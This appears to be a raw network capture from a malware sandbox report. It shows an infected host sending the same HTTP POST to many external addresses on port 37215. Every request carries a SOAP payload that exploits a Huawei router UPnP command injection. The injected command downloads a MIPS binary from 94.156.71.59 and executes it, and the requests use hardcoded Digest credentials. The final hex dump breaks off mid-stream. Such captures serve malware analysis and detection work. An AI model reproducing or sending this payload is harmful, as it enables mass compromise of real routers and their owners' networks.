                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            224192.168.2.135746441.65.114.22937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.170870066 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            225192.168.2.1337844156.195.94.2337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.171880960 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            226192.168.2.135767841.13.119.1537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.172950983 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            227192.168.2.1333040156.217.108.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.173963070 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            228192.168.2.1356568197.123.247.9037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.175014973 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            229192.168.2.1341532197.127.189.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.176045895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            230192.168.2.1339800156.160.21.12837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.177056074 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            231192.168.2.134407841.69.149.12037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.178071022 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            232192.168.2.1350148156.179.233.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.179071903 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            233192.168.2.134454241.167.61.20237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.179963112 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 